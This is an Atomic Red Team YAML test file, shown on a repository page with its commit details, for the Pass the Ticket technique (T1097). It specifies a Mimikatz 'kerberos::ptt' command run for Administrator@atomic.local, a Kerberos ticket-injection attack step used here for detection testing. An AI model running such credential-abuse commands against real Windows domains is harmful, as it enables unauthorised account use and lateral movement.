Files
atomic-red-team/atomics/T1097/T1097.yaml
T
Makenzie Schwartz 3523ec7a1c T1097 - Move PTT atomic test to appropriate technique (#524)
* Move Mimikatz PTT atomic from T1075 to T1097

* Update docs
2019-08-27 09:40:03 -06:00

27 lines
514 B
YAML

---
attack_technique: T1097
display_name: Pass the Ticket
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
description: |
Similar to PTH, but attacking Kerberos
supported_platforms:
- windows
input_arguments:
user_name:
description: username
type: string
default: Administrator
domain:
description: domain
type: string
default: atomic.local
executor:
name: command_prompt
command: |
mimikatz # kerberos::ptt #{user_name}@#{domain}